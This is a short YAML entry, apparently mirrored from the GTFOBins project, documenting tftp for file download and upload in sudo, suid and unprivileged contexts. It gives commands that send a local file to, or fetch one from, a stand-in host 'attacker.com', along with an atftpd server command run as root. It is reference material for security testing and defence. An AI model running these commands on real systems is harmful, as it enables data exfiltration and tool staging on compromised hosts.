mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-08 06:56:15 +01:00
30 lines
676 B
Plaintext
30 lines
676 B
Plaintext
---
|
|
functions:
|
|
download:
|
|
- code: |-
|
|
tftp attacker.com
|
|
get /path/to/input-file
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
sender:
|
|
code: |-
|
|
atftpd --no-fork --verbose --daemon --no-fork --user root.root .
|
|
comment: |-
|
|
A TFTP server can be used on the attacker box to send the data.
|
|
upload:
|
|
- code: |-
|
|
tftp attacker.com
|
|
put /path/to/input-file
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
receiver:
|
|
code: |-
|
|
atftpd --no-fork --verbose --daemon --no-fork --user root.root .
|
|
comment: |-
|
|
A TFTP server can be used on the attacker box to receive the data.
|
|
...
|